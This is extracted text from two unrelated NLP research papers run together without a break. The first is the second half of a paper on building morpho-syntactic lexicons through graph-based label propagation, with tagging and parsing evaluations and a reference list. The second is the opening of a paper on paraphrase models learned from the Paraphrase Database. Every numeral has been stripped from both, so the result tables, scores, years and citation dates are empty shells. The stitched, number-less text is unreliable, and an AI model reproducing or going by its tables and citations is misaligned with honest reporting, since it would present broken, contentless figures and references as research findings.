corpus baseline. we compare our results to a corpus-based method of obtaining morpho-syntactic lexicons. we hypothesize that if we use a morpho- logical tagger of reasonable quality to tag the entire wikipedia corpus of a language and take the union of all the attributes for a word type across all its occur- rences in the corpus, then we can acquire all possible attributes for a given word. hence, producing a lex- icon of reasonable quality. moore ( ) used this technique to obtain a high quality tag dictionary for words corpus propagation eu . . bg . . hr . . cs . . da . . en . . fi . . el . . hu . . it . . sv . . avg. . . table : micro-averaged f score (%) for prediction of lexical attributes on the test set using our propagation algorithm (propagation) and the corpus-based baseline (corpus). also, shown are the no. of words in test set. words f cs , . fi , . hu , . avg. , . table : micro-averaged f score (%) for prediction of lexical attributes on the test lexicon of human-curated lexicons. pos-tagging. we thus train a morphological tagger (detail in § . ) on the training portion of the depen- dency treebank and use it to tag the entire wikipedia corpus. for every word, we add an attribute to the lexicon if it has been seen at least k times for the word in the corpus, where k ∈ [ , ]. this thresh- old on the frequency of the word-attribute pair helps prevent noisy judgements. we tune k for each lan- guage on the development set and report results on the test set in table . we call this method the cor- pus baseline. it can be seen that for every language we outperform this baseline, which on average has an f score of . %. . manually curated lexicons we have now showed that its possible to automat- ically construct large lexicons from smaller seed lexicons. however, the seed lexicons used in § . have been artifically constructed from aggregating attributes of word types over the treebank. thus, it word exchange cluster∗ lowercase(word) capitalization { , , }-g suffix∗ digit { , , }-g prefix∗ punctuation table : features used to train the morphological tagger on the universal dependency treebank. ∗:on for word off- sets {- , - , , , }. conjunctions of the above are also included. can be argued that these constructed lexicons might not be complete i.e, the lexicon might not exhibit all possible attributes for a given word. on the other hand, manually curated lexicons are unavailable for many languages, inhibiting proper evaluation. to test the utility of our approach on manually cu- rated lexicons, we investigate publicly available lex- icons for finnish (pirinen, ), czech (hajič and hladká, ) and hungarian (trón et al., ). we eliminate numbers and punctuation from all lex- icons. for each of these languages, we select words for training and the rest of the word types for evaluation. we train models obtained in § . for a given language using suffix, brown and morpholog- ical transformation features with paradigm projec- tion. the only difference is the source of the seed lexicon and test set. results are reported in table averaged over different randomly selected seed set for every language. for each language we ob- tain more than % f score and on an average ob- tain . %. critically, the f score on human cu- rated lexicons is higher for each language than the treebank constructed lexicons, in some cases as high as % absolute. this shows that the average . % f score across all languages is likely underesti- mated. extrinsic evaluation we now show that the automatically generated lex- icons provide informative features that are useful in two downstream nlp tasks: morphological tagging (§ . ) and syntactic dependency parsing (§ . ). . morphological tagging morphological tagging is the task of assigning a morphological reading to a token in context. the morphological reading consists of features such as part of speech, case, gender, person, tense etc. none seed propagation eu . . . bg . . . hr . . . cs . . . da . . . en . . . fi . . . el . . . hu . . . it . . . sv . . . avg. . . . table : macro-averaged f score (%) for morphologi- cal tagging: without using any lexicon (none), with seed lexicon (seed), with propagated lexicon (propagation). (oflazer and kuruöz, ; hajič and hladká, ). the model we use is a standard atomic se- quence classifier, that classifies the morphological bundle for each word independent of the others (with the exception of features derived from these words). specifically, we use a linear svm model classifier with hand tuned features. this is similar to com- monly used analyzers like svmtagger (giménez and marquez, ) and matetagger (bohnet and nivre, ). our taggers are trained in a language independent manner (hajič, ; smith et al., ; müller et al., ). the list of features used in training the tagger are listed in table . in addition to the stan- dard features, we use the morpho-syntactic attributes present in the lexicon for every word as features in the tagger. as shown in müller and schuetze ( ), this is typically the most important feature for mor- phological tagging, even more useful than clusters or word embeddings. while predicting the contex- tual morphological tags for a given word, the mor- phological attributes present in the lexicon for the current word, the previous word and the next word are used as features. we use the same languages from the univer- sal dependency treebanks (agić et al., ) that contain morphological tags to train and evaluate the morphological taggers. we use the pre-specified train/dev/test splits that come with the data. ta- ble shows the macro-averaged f score over all none seed propagation eu . . . bg . . . hr . . . cs . . . da . . . en . . . fi . . . el . . . hu . . . it . . . sv . . . avg. . . . table : labeled accuracy score (las, %) for depen- dency parsing: without using any lexicon (none), with seed (seed), with propagated lexicon (propagation). attributes for each language on the test lexicon. the three columns show the f score of the tagger when no lexicon is used; when the seed lexicon derived from the training data is used; and when label prop- agation is applied. overall, using lexicons provides a significant im- provement in accuracy, even when just using the seed lexicon. for out of languages, the high- est accuracy is obtained using the lexicon derived from graph propagation. in some cases the gain is quite substantial, e.g., . % → . % for bulgar- ian. overall there is . % and . % absolute im- provement over the baseline and seed resp., which corresponds roughly to a % and % relative re- duction in error. it is not surprising that the seed lexicon performs on par with the derived lexicon for some languages, as it is derived from the train- ing corpus, which likely contains the most frequent words of the language. . dependency parsing we train dependency parsers for the same uni- versal dependency treebanks that contain the mor- phological layer (agić et al., ). we again use the supplied train/dev/test split of the dependency treebank to develop the models. our parsing model is the transition-based parsing system of zhang and nivre ( ) with identical features and a beam of size . we augment the features of zhang and nivre figure : micro-average f score on test lexicon while using varying seed sizes for cs, hu and fi. ( ) in two ways: using the context-independent morphological attributes present in the different lex- icons; and using the corresponding morphological taggers from § . to generate context-dependent at- tributes. for each of the above two kinds of features, we fire the attributes for the word on top of the stack and the two words on at the front of the buffer. ad- ditionally we take the cross product of these features between the word on the top of the stack and at the front of the buffer. table shows the labeled accuracy score (las) for all languages. overall, the generated lexicon gives an improvement of absolute . % point over the baseline ( . % relative reduction in error) and . % over the seed lexicon on an average across languages. critically this improvement holds for / languages over the baseline and / lan- guages over the system that uses seed lexicon only. further analysis in this section we further investigate our model and results in detail. size of seed lexicon. we first test how the size of the seed lexicon affects performance of attribute prediction on the test set. we use the manually constructed lexicons described in § . for experi- ments. for each language, instead of using the full seed lexicon of words, we construct sub- sets of this lexicon by taking and ran- domly sampled words. we then train models ob- tained in § . on these lexicons and plot the perfor- mance on the test set in figure . on average across word attributes en study (seed) pos:verb, vform:fin, mood:ind, tense:pres, num:sing, pos:noun studied pos:verb, vform:fin, mood:ind, tense:past, vform:part taught pos:verb, vform:fin, mood:ind, tense:past, vform:part, voice:pass it tavola (seed) pos:noun, gender:fem, num:sing tavoli pos:noun, gender:masc, num:plur divano pos:noun, gender:masc, num:sing table : attributes induced for words which are semantically or syntactically related to a word in the seed lexicon for english and italian. vform:ger num:plur clus: + clus: + clus: + clus: + clus: + clus: + suffix:ing:{null} - suffix:ies:y - suffix:ping:{null} - suffix:gs:g - suffix:ing:er - suffix:ons:on - table : highest (upper half) and lowest (lower half) weighted features (with their sign) for predicting a given attribute of english words. three languages, we observe that the absolute perfor- mance improvement from to seed words is ≈ % whereas it reduces to ≈ % from to words. feature analysis. table shows the highest and the lowest weighted features for predicting a given attribute of english words. the highest weighted features for both vform:ger and num:plur are word clusters, indicating that word clusters exhibit strong syntactic and semantic coherence. more interestingly, it can be seen that for predicting vform:ger i.e, continuous verb forms, the lowest weighted features are those morphological transfor- mations that substitute “ing” with something else. thus, if there exists an edge between the words studying and study, containing the feature: suf- fix:ing:{null}, the model would correctly predict that studying is vform:ger as study is not so and the negative feature weight can flip the label values. the same observation holds true for num:plur. feature ablation. one key question is which of the features in our graph are important for project- ing morphological attribute-values. table suggests that this is language specific, which is intuitive, as cs hu fi s + c + mt . . . s + c . . . s + mt . . . c + mt . . . s + c + mt + p . . . table : feature ablation study for induced lexicons evaluated on manually curated gold lexicons. reported scores are micro-averaged f score (%) for prediction of lexical attributes. s = suffix; p = prefix; c = clusters; and mt = morphological transformations. morphology can be represented more or less regu- larly through the surface form depending on the lan- guage. to understand this, we did a feature ablation study for the three languages with manually curated lexicons (§ . ) using the same feature set as before: clusters, suffix and morphological transformations with paradigm projection. we then leave out each feature to measure how performance drops. unlike § . , we do not average over runs but use a sin- gle static graph where features (edges) are added or removed as necessary. table contains the results. critically, all fea- tures are required for top accuracy across all lan- guages and leaving out suffix features has the most detrimental effect. this is not surprising considering all three language primarily express morphological properties via suffixes. furthermore, suffix features help to connect the graph and assist label propaga- tion. note that the importance of suffix features here is in contrast to the evaluation on treebank derived lexicons in § . , where suffix features were only se- lected for out of languages based on the devel- opment data (table ), and not for hungarian and finnish. this could be due to the nature of the lex- icons derived from treebanks versus complete lexi- cons constructed by humans. additionally, we also added back prefix features and found that for all languages, this resulted in a drop in accuracy, particularly for finnish and hun- garian. the primary reason for this is that prefix fea- tures often create spurious edges in the graph. this in and of itself is not a problem for our model, as the edge weights should learn to discount this feature. however, the fact that we sample edges to make in- ference tractable means that more informative edges could be dropped in favor of those that are only con- nected via a prefix features. prediction examples. table shows examples of predictions made by our model for english and ital- ian. for each language, we first select a random word from the seed lexicon, then we pick one syn- tactic and one semantically related word to the se- lected word from the set of unlabeled words. for e.g., in italian tavola means table, whereas tavoli is the plural form and divano means sofa. we correctly identify attributes for these words. related work we now review the areas of related work. lexicon generation. eskander et al. ( ) con- struct morpho-syntactic lexicons by incrementally merging inflectional classes with shared morpholog- ical features. natural language lexicons have often been created from smaller seed lexcions using var- ious methods. thelen and riloff ( ) use pat- terns extracted over a large corpus to learn semantic lexicons from smaller seed lexicons using bootstrap- ping. alfonseca et al. ( ) use distributional simi- larity scores across instances to propagate attributes using random walks over a graph. das and smith ( ) learn potential semantic frames for unknown predicates by expanding a seed frame lexicon. sen- timent lexicons containing semantic polarity labels for words and phrases have been created using boot- strapping and graph-based learning (banea et al., ; mohammad et al., ; velikovich et al., ; takamura et al., ; lu et al., ). graph-based learning. in general, graph-based semi-supervised learning is heavily used in nlp (talukdar and cohen, ; subramanya and taluk- dar, ). graph-based learning has been used for class-instance acquisition (talukdar and pereira, ), text classification (subramanya and bilmes, ), summarization (erkan and radev, ), structured prediction problems (subramanya et al., ; das and petrov, ; garrette et al., ) etc. our work differs from most of these approaches in that we specifically learn how different features shared between the nodes can correspond to either the propagation of an attribute or an inversion of the attribute value (cf. equ ). in terms of the ca- pability of inverting an attribute value, our method is close to goldberg et al. ( ), who present a framework to include dissimilarity between nodes and talukdar et al. ( ), who learn which edges can be excluded for label propagation. in terms of featurizing the edges, our work resembles previous work which measured similarity between nodes in terms of similarity between the feature types that they share (muthukrishnan et al., ; saluja and navrátil, ). our work is also related to graph- based metric learning, where the objective is to learn a suitable distance metric between the nodes of a graph for solving a given problem (weinberger et al., ; dhillon et al., ). morphology. high morphological complexity ex- acerbates the problem of feature sparsity in many nlp applications and leads to poor estimation of model parameters, emphasizing the need of mor- phological analysis. morphological analysis en- compasses fields like morphological segmentation (creutz and lagus, ; demberg, ; snyder and barzilay, ; poon et al., ; narasimhan et al., ), and inflection generation (yarowsky and wicentowski, ; wicentowski, ). such models of segmentation and inflection generation are used to better understand the meaning and re- lations between words. our task is complementary to the task of morphological paradigm generation. paradigm generation requires generating all possible morphological forms of a given base-form according to different linguistic transformations (dreyer and eisner, ; durrett and denero, ; ahlberg et al., ; ahlberg et al., ; nicolai et al., ; faruqui et al., ), whereas our task requires iden- tifying linguistic transformations between two dif- ferent word forms. low-resourced languages. our algorithm can be used to generate morpho-syntactic lexicons for low- resourced languages, where the seed lexicon can be constructed, for example, using crowdsourcing (callison-burch and dredze, ; irvine and kle- mentiev, ). morpho-syntactic resources have been developed for east-european languages like slovene (dzeroski et al., ; erjavec, ), bulgarian (simov et al., ) and highly agglu- tinative languages like turkish (sak et al., ). morpho-syntactic lexicons are crucial components in acousting modeling and automatic speech recog- nition, where they have been developed for low- resourced languages (huet et al., ; besacier et al., ). one alternative method to extract morphosyntac- tic lexicons is via parallel data (das and petrov, ). however, such methods assume that both the source and target langauges are isomorphic with respect to morphology. this can be the case with attributes like coarse part-of-speech or case, but is rarely true for other attributes like gender, which is very language specific. future work there are three major ways in which the current model can be possibly improved. joint learning and propagation. in the current model, we are first learning the weights in a su- pervised manner (§ . ) and then propagating labels across nodes in a semi-supervised step with fixed feature weights (§ . ). these can also be performed jointly: perform one iteration of weight learning, propagate labels using these weights, perform an- other iteration of weight learning assuming empir- ical labels as gold labels and continue to learn and propagate until convergence. this joint learning would be slower than the current approach as prop- agating labels across the graph is an expensive step. multi-label classifcation. we are currently using the binary relevance method which trains a binary classifier for every attribute independently (godbole and sarawagi, ; zhang and zhou, ) with paradigm projection as a post-processing step (§ . ). thus we are accounting for attribute correlations only at the end. we can instead model such cor- relations as constraints during the learning step to obtain better solutions (ghamrawi and mccallum, ; tsoumakas and katakis, ; fürnkranz et al., ; read et al., ). richer feature set. in addition our model can ben- efit from a richer set of features. word embeddings can be used to connect word node which are similar in meaning (mikolov et al., ). we can use ex- isting morphological segmentation tools to discover the morpheme and inflections of a word to connect it to word with similar inflections which might be bet- ter than the crude suffix or prefix features. we can also use rich lexical resources like wiktionary to extract relations between words that can be encoded on our graph edges. conclusion we have presented a graph-based semi-supervised method to construct large annotated morpho- syntactic lexicons from small seed lexicons. our method is language independent and we have con- structed lexicons for different languages. we showed that the lexicons thus constructed help im- prove performance in morphological tagging and de- pendency parsing, when used as features. acknowledgement this work was performed when the first author was an intern at google. we thank action editor alexander clark, and the three anonymous review- ers for their helpful suggestions in preparing the manuscript. we thank david talbot for his help in developing the propagation framework and help- ful discussions about evaluation. we thank avneesh saluja, chris dyer and partha pratim talukdar for their comments on drafts of this paper. references željko agić, maria jesus aranzabe, aitziber atutxa, cristina bosco, jinho choi, marie-catherine de marn- effe, timothy dozat, richárd farkas, jennifer foster, filip ginter, iakes goenaga, koldo gojenola, yoav goldberg, jan hajič, anders trærup johannsen, jenna https://www.wiktionary.org/ kanerva, juha kuokkala, veronika laippala, alessan- dro lenci, krister lindén, nikola ljubešić, teresa lynn, christopher manning, héctor alonso martı́nez, ryan mcdonald, anna missilä, simonetta monte- magni, joakim nivre, hanna nurmi, petya osenova, slav petrov, jussi piitulainen, barbara plank, prokopis prokopidis, sampo pyysalo, wolfgang seeker, moj- gan seraji, natalia silveira, maria simi, kiril simov, aaron smith, reut tsarfaty, veronika vincze, and daniel zeman. . universal dependencies . . lindat/clarin digital library at institute of formal and applied linguistics, charles university in prague. malin ahlberg, markus forsberg, and mans hulden. . semi-supervised learning of morphological paradigms and lexicons. in proc. of eacl. malin ahlberg, markus forsberg, and mans hulden. . paradigm classification in supervised learning of morphology. in proc. of naacl. enrique alfonseca, marius pasca, and enrique robledo- arnuncio. . acquisition of instance attributes via labeled and related instances. in proc. of sigir. ebru arisoy, murat saraçlar, brian roark, and izhak shafran. . syntactic and sub-lexical features for turkish discriminative language models. in proc. of icassp. carmen banea, janyce m. wiebe, and rada mihalcea. . a bootstrapping method for building subjectiv- ity lexicons for languages with scarce resources. in proc. of lrec. yoshua bengio, olivier delalleau, and nicolas le roux. . label propagation and quadratic criterion. in semi-supervised learning. mit press. laurent besacier, etienne barnard, alexey karpov, and tanja schultz. . automatic speech recogni- tion for under-resourced languages: a survey. speech communication, : – . bernd bohnet and joakim nivre. . a transition- based system for joint part-of-speech tagging and la- beled non-projective dependency parsing. in proc. of emnlp. chris callison-burch and mark dredze. . creat- ing speech and language data with amazon’s mechan- ical turk. in proc. of naacl workshop on creating speech and language data with amazon’s mechani- cal turk. alexander clark. . combining distributional and morphological information for part of speech induc- tion. in proc. of eacl. mathias creutz and krista lagus. . unsupervised models for morpheme segmentation and morphology learning. acm transactions on speech and language processing (tslp), ( ): . dipanjan das and slav petrov. . unsupervised part- of-speech tagging with bilingual graph-based projec- tions. in proc. of acl. dipanjan das and noah a. smith. . graph-based lexicon expansion with sparsity-inducing penalties. in proc. of naacl. marie-catherine de marneffe, timothy dozat, natalia silveira, katri haverinen, filip ginter, joakim nivre, and christopher d. manning. . universal stan- ford dependencies: a cross-linguistic typology. in proceedings of lrec. vera demberg. . a language-independent unsuper- vised model for morphological segmentation. in proc. of acl. pascal denis and benoı̂t sagot. . coupling an anno- tated corpus and a morphosyntactic lexicon for state- of-the-art pos tagging with less human effort. in proc. of paclic. paramveer s. dhillon, partha talukdar, and koby cram- mer. . metric learning for graph-based domain adaptation. in proc. of coling. markus dreyer and jason eisner. . discover- ing morphological paradigms from plain text using a dirichlet process mixture model. in proc. of emnlp. matthew s. dryer. . prefixing vs. suffixing in inflec- tional morphology. max planck institute for evolu- tionary anthropology. john duchi, elad hazan, and yoram singer. . adaptive subgradient methods for online learning and stochastic optimization. the journal of machine learning research, : – . kais dukes and nizar habash. . morphological annotation of quranic arabic. in proc. of lrec. greg durrett and john denero. . supervised learn- ing of complete morphological paradigms. in proc. of naacl. saso dzeroski, tomaz erjavec, and jakub zavrel. . morphosyntactic tagging of slovene: evaluating tag- gers and tagsets. in proc. of lrec. tomaz erjavec. . multext-east version : multilin- gual morphosyntactic specifications, lexicons and cor- pora. in proc. of lrec. günes erkan and dragomir r. radev. . lexrank: graph-based lexical centrality as salience in text sum- marization. journal of artificial intelligence re- search, ( ): – . ramy eskander, nizar habash, and owen rambow. . automatic extraction of morphological lexicons from morphologically annotated corpora. in proc. of emnlp. manaal faruqui and sebastian padó. . training and evaluating a german named entity recognizer with se- mantic generalization. in proc. of konvens. manaal faruqui, yulia tsvetkov, graham neubig, and chris dyer. . morphological inflection gener- ation using character sequence to sequence learning. arxiv: . . chun-sung ferng and hsuan-tien lin. . multi- label classification with error-correcting codes. in proc. of acml. johannes fürnkranz, eyke hüllermeier, eneldo loza mencı́a, and klaus brinker. . multilabel classifi- cation via calibrated label ranking. machine learning, ( ): – . dan garrette, jason mielens, and jason baldridge. . real-world semi-supervised learning of pos-taggers for low-resource languages. in proc. of acl. nadia ghamrawi and andrew mccallum. . collec- tive multi-label classification. in proc. of cikm. jesús giménez and lluı́s marquez. . svmtool: a general pos tagger generator based on support vector machines. in proc. of lrec. shantanu godbole and sunita sarawagi. . discrim- inative methods for multi-labeled classification. in proc. of kdd. andrew b. goldberg, xiaojin zhu, and stephen j. wright. . dissimilarity in graph-based semi- supervised classification. in proc. of aistats. yoav goldberg, reut tsarfaty, meni adler, and michael elhadad. . enhancing unlexicalized parsing per- formance using a wide coverage lexicon, fuzzy tag-set mapping, and em-hmm-based lexical probabilities. in proc. of eacl. spence green and john denero. . a class-based agreement model for generating accurately inflected translations. in proc. of acl. jan hajič and barbora hladká. . tagging inflective languages: prediction of morphological categories for a rich, structured tagset. in proc. of coling. jan hajič. . morphological tagging: data vs. dictio- naries. in proc. of naacl. daniel hsu, sham kakade, john langford, and tong zhang. . multi-label prediction via compressed sensing. in proc. of nips. stéphane huet, guillaume gravier, and pascale sébillot. . morphosyntactic resources for automatic speech recognition. in proc. of lrec. ann irvine and alexandre klementiev. . using me- chanical turk to annotate lexicons for less commonly used languages. in proc. of naacl workshop on cre- ating speech and language data with amazon’s me- chanical turk. ernst ising. . beitrag zur theorie des ferromag- netismus. zeitschrift für physik a hadrons and nu- clei, ( ): – . reinhard kneser and hermann ney. . improved clustering techniques for class-based statistical lan- guage modelling. in proc. of eurospeech. dimitrios kokkinakis, maria toporowska-gronostaj, and karin warmenius. . annotating, disambiguat- ing & automatically extending the coverage of the swedish simple lexicon. in proc. of lrec. terry koo, xavier carreras, and michael collins. . simple semi-supervised dependency parsing. in proc. of acl. sandra kübler, ryan mcdonald, and joakim nivre. . dependency parsing. synthesis lectures on human language technologies. morgan & claypool publishers. yue lu, malu castellanos, umeshwar dayal, and chengxiang zhai. . automatic construction of a context-aware sentiment lexicon: an optimization ap- proach. in proc. of www. sven martin, jörg liermann, and hermann ney. . algorithms for bigram and trigram word clustering. speech communication, ( ): – . ryan mcdonald, joakim nivre, yvonne quirmbach- brundage, yoav goldberg, dipanjan das, kuzman ganchev, keith b. hall, slav petrov, hao zhang, os- car täckström, claudia bedini, núria b. castelló, and jungmee lee. . universal dependency annota- tion for multilingual parsing. in proc. of acl. tomas mikolov, wen-tau yih, and geoffrey zweig. . linguistic regularities in continuous space word representations. in proc. of naacl. einat minkov, kristina toutanova, and hisami suzuki. . generating complex morphology for machine translation. in proc. of acl. saif mohammad, cody dunne, and bonnie dorr. . generating high-coverage semantic orientation lexi- cons from overtly marked words and a thesaurus. in proc. of emnlp. robert moore. . an improved tag dictionary for faster part-of-speech tagging. in proc. of emnlp. thomas müller and hinrich schuetze. . robust morphological tagging with word representations. in proceedings of naacl. thomas müller, helmut schmid, and hinrich schütze. . efficient higher-order crfs for morphological tagging. in proc. of emnlp. pradeep muthukrishnan, dragomir radev, and qiaozhu mei. . simultaneous similarity learning and feature-weight learning for document clustering. in proc. of textgraphs. karthik narasimhan, regina barzilay, and tommi jaakkola. . an unsupervised method for uncov- ering morphological chains. transactions of the asso- ciation for computational linguistics, : – . garrett nicolai, colin cherry, and grzegorz kondrak. . inflection generation as discriminative string transduction. in proc. of naacl. sonja nießen and hermann ney. . statistical ma- chine translation with scarce resources using morpho- syntactic information. computational linguistics, ( ). kemal oflazer and ìlker kuruöz. . tagging and morphological disambiguation of turkish text. in proc. of anlp. olutobi owoputi, brendan o’connor, chris dyer, kevin gimpel, nathan schneider, and noah a. smith. . improved part-of-speech tagging for online conversa- tional text with word clusters. in proc. of naacl. tommi a pirinen. . modularisation of finnish finite- state language description—towards wide collabora- tion in open source development of a morphological analyser. in proc. of nodalida. hoifung poon, colin cherry, and kristina toutanova. . unsupervised morphological segmentation with log-linear models. in proc. of naacl. adwait ratnaparkhi. . a maximum entropy model for part-of-speech tagging. in proc. of emnlp. jesse read, bernhard pfahringer, geoff holmes, and eibe frank. . classifier chains for multi-label classification. machine learning, ( ): – . haşim sak, tunga güngör, and murat saraçlar. . turkish language resources: morphological parser, morphological disambiguator and web corpus. in proc. of anlp. avneesh saluja and jirı navrátil. . graph-based unsupervised learning of word similarities using het- erogeneous feature types. in proc. of textgraphs. helmut schmid. . probabilistic part-of-speech tag- ging using decision trees. in proc. of the international conference on new methods in language processing. kiril ivanov simov, petya osenova, sia kolkovska, elisaveta balabanova, and dimitar doikoff. . a language resources infrastructure for bulgarian. in proc. of lrec. noah a. smith, david a. smith, and roy w. tromble. . context-based morphological disambiguation with random fields. in proc. of emnlp. benjamin snyder and regina barzilay. . unsuper- vised multilingual learning for morphological segmen- tation. in proc. of acl. radu soricut and franz och. . unsupervised mor- phology induction using word embeddings. in proc. of naacl. amarnag subramanya and jeff bilmes. . soft- supervised learning for text classification. in proc. of emnlp. amarnag subramanya and partha pratim talukdar. . graph-based semi-supervised learning. synthesis lec- tures on artificial intelligence and machine learning, ( ). amarnag subramanya, slav petrov, and fernando pereira. . efficient graph-based semi-supervised learning of structured tagging models. in proc. of emnlp. oscar täckström, ryan mcdonald, and jakob uszkoreit. . cross-lingual word clusters for direct transfer of linguistic structure. in proc. of naacl. hiroya takamura, takashi inui, and manabu okumura. . extracting semantic orientations of phrases from dictionary. in proc. of naacl. partha pratim talukdar and william cohen. . scaling graph-based semi-supervised learning to large number of labels using count-min sketch. in proc. of aistats. partha pratim talukdar and fernando pereira. . experiments in graph-based semi-supervised learning methods for class-instance acquisition. in proc. of acl. partha pratim talukdar, derry wijaya, and tom mitchell. . acquiring temporal constraints between rela- tions. in proc. of cikm. michael thelen and ellen riloff. . a bootstrapping method for learning semantic lexicons using extraction pattern contexts. in proc. of acl. viktor trón, péter halácsy, péter rebrus, andrás rung, péter vajda, and eszter simon. . morphdb.hu: hungarian lexical database and morphological gram- mar. in proc. of lrec. grigorios tsoumakas and ioannis katakis. . multi- label classification: an overview. dept. of informat- ics, aristotle university of thessaloniki, greece. joseph turian, lev ratinov, and yoshua bengio. . word representations: a simple and general method for semi-supervised learning. in proc. of acl. jakob uszkoreit and thorsten brants. . distributed word clustering for large scale class-based language modeling in machine translation. in proc. of acl. leonid velikovich, sasha blair-goldensohn, kerry han- nan, and ryan mcdonald. . the viability of web- derived polarity lexicons. in proc. of naacl. fei wang, shijun wang, changshui zhang, and ole winther. . semi-supervised mean fields. in proc. of aistats. kilian q. weinberger, john blitzer, and lawrence k. saul. . distance metric learning for large mar- gin nearest neighbor classification. in proc. of nips. richard wicentowski. . multilingual noise-robust supervised morphological analysis using the word- frame model. in proc. of sigphon. david yarowsky and richard wicentowski. . min- imally supervised morphological analysis by multi- modal alignment. in proc. of acl. yue zhang and joakim nivre. . transition-based dependency parsing with rich non-local features. in proc. of acl. yi zhang and jeff g. schneider. . multi-label output codes using canonical correlation analysis. in proc. of aistats. min-ling zhang and zhi-hua zhou. . a k-nearest neighbor based algorithm for multi-label classifica- tion. in proc. of ieee conference on granular com- puting. xiaojin zhu. . semi-supervised learning with graphs. ph.d. thesis, carnegie mellon university, pittsburgh, pa, usa. aai . from paraphrase database to compositional paraphrase model and back john wieting∗ mohit bansal† kevin gimpel† karen livescu† ∗university of illinois at urbana-champaign, urbana, il, , usa wieting @illinois.edu †toyota technological institute at chicago, chicago, il, , usa {mbansal,kgimpel,klivescu}@ttic.edu abstract the paraphrase database (ppdb; ganitke- vitch et al., ) is an extensive semantic re- source, consisting of a list of phrase pairs with (heuristic) confidence estimates. however, it is still unclear how it can best be used, due to the heuristic nature of the confidences and its necessarily incomplete coverage. we propose models to leverage the phrase pairs from the ppdb to build parametric paraphrase models that score paraphrase pairs more accurately than the ppdb’s internal scores while simul- taneously improving its coverage. they allow for learning phrase embeddings as well as im- proved word embeddings. moreover, we in- troduce two new, manually annotated datasets to evaluate short-phrase paraphrasing mod- els. using our paraphrase model trained using ppdb, we achieve state-of-the-art results on standard word and bigram similarity tasks and beat strong baselines on our new short phrase paraphrase tasks. introduction paraphrase detection is the task of analyzing two segments of text and determining if they have the same meaning despite differences in structure and wording. it is useful for a variety of nlp tasks like question answering (rinaldi et al., ; fader et al., ), semantic parsing (berant and liang, ), textual entailment (bosma and callison- burch, ), and machine translation (marton et al., ). we release our datasets, code, and trained models at http://web.engr.illinois.edu/˜wieting /. see androutsopoulos and malakasiotis ( ) for a survey on approaches for detecting paraphrases. one component of many such systems is a para- phrase table containing pairs of text snippets, usu- ally automatically generated, that have the same meaning. the most recent work in this area is the paraphrase database (ppdb; ganitkevitch et al., ), a collection of confidence-rated paraphrases created using the pivoting technique of bannard and callison-burch ( ) over large parallel corpora. the ppdb is a massive resource, containing million paraphrase pairs. it captures many short paraphrases that would be difficult to obtain us- ing any other resource. for example, the pair {we must do our utmost, we must make every effort} has little lexical overlap but is present in ppdb. the ppdb has recently been used for monolingual align- ment (yao et al., ), for predicting sentence sim- ilarity (bjerva et al., ), and to improve the cov- erage of framenet (rastogi and van durme, ). though already effective for multiple nlp tasks, we note some drawbacks of ppdb. the first is lack of coverage: to use the ppdb to compare two phrases, both must be in the database. the second is that ppdb is a nonparametric paraphrase model; the number of parameters (phrase pairs) grows with the size of the dataset used to build it. in practice, it can become unwieldy to work with as the size of the database increases. a third concern is that the confidence estimates in ppdb are a heuristic com- bination of features, and their quality is unclear. we address these issues in this work by introduc- ing ways to use ppdb to construct parametric para- phrase models. first we show that initial skip-gram word vectors (mikolov et al., a) can be fine- tuned for the paraphrase task by training on word pairs from ppdb. we call them paragram word vectors. we find additive composition of para- gram vectors to be a simple but effective way to transactions of the association for computational linguistics, vol. , pp. – , . action editor: hal daumeé iii. submission batch: / ; revision batch / ; published / . c© association for computational linguistics. distributed under a cc-by-nc-sa . license. http://web.engr.illinois.edu/~wieting / embed phrases for short-phrase paraphrase tasks. we find improved performance by training a recur- sive neural network (rnn; socher et al., ) di- rectly on phrase pairs from ppdb. we show that our resulting word and phrase rep- resentations are effective on a wide variety of tasks, including two new datasets that we introduce. the first, annotated-ppdb, contains pairs from ppdb that were scored by human annotators. it can be used to evaluate paraphrase models for short phrases. we use it to show that the phrase embeddings produced by our methods are significantly more indicative of paraphrasability than the original heuristic scoring used by ganitkevitch et al. ( ). thus we use the power of ppdb to improve its contents. our second dataset, ml-paraphrase, is a re- annotation of the bigram similarity corpus from mitchell and lapata ( ). the task was origi- nally developed to measure semantic similarity of bigrams, but some annotations are not congruent with the functional similarity central to paraphrase relationships. our re-annotation can be used to assess paraphrasing capability of bigram composi- tional models. in summary, we make the following contributions: provide new paragram word vectors, learned using ppdb, that achieve state-of-the-art per- formance on the simlex- lexical similarity task (hill et al., b) and lead to improved per- formance in sentiment analysis. provide ways to use ppdb to embed phrases. we compare additive and rnn composition of para- gram vectors. both can improve ppdb by re- ranking the paraphrases in ppdb to improve corre- lations with human judgments. they can be used as concise parameterizations of ppdb, thereby vastly increasing its coverage. we also perform a qualita- tive analysis of the differences between additive and rnn composition. introduce two new datasets. the first contains ppdb phrase pairs and evaluates how well models can measure the quality of short paraphrases. the second is a new annotation of the bigram similar- ity task in mitchell and lapata ( ) that makes it suitable for evaluating bigram paraphrases. we release the new datasets, complete with anno- tation instructions and raw annotations, as well as our code and the trained models. related work there is a vast literature on representing words as vectors. the intuition of most methods to create these vectors (or embeddings) is that similar words have similar contexts (firth, ). earlier models made use of latent semantic analysis (lsa) (deer- wester et al., ). recently, more sophisticated neural models, work originating with (bengio et al., ), have been gaining popularity (mikolov et al., a; pennington et al., ). these embeddings are now being used in new ways as they are being tailored to specific downstream tasks (bansal et al., ). phrase representations can be created from word vectors using compositional models. simple but effective compositional models were studied by mitchell and lapata ( ; ) and blacoe and lapata ( ). they compared a variety of bi- nary operations on word vectors and found that simple point-wise multiplication of explicit vector representations performed very well. other works like zanzotto et al. ( ) and baroni and zampar- elli ( ) also explored composition using models based on operations of vectors and matrices. more recent work has shown that the extremely efficient neural embeddings of mikolov et al. ( a) also do well on compositional tasks simply by adding the word vectors (mikolov et al., b). hashimoto et al. ( ) introduced an alternative word embedding and compositional model based on predicate-argument structures that does well on two simple composition tasks, including the one intro- duced by mitchell and lapata ( ). an alternative approach to composition, used by socher et al. ( ), is to train a recursive neural network (rnn) whose structure is defined by a bi- narized parse tree. in particular, they trained their rnn as an unsupervised autoencoder. the rnn captures the latent structure of composition. recent work has shown that this model struggles in tasks in- volving compositionality (blacoe and lapata, ; hashimoto et al., ). however, we found suc- http://web.engr.illinois.edu/˜wieting / we also replicated this approach and found training to be time-consuming even using low-dimensional word vectors. http://web.engr.illinois.edu/~wieting / cess using rnns in a supervised setting, similar to socher et al. ( ), who used rnns to learn representations for image descriptions. the objec- tive function we used in this work was motivated by their multimodal objective function for learning joint image-sentence representations. lastly, the ppdb has been used along with other resources 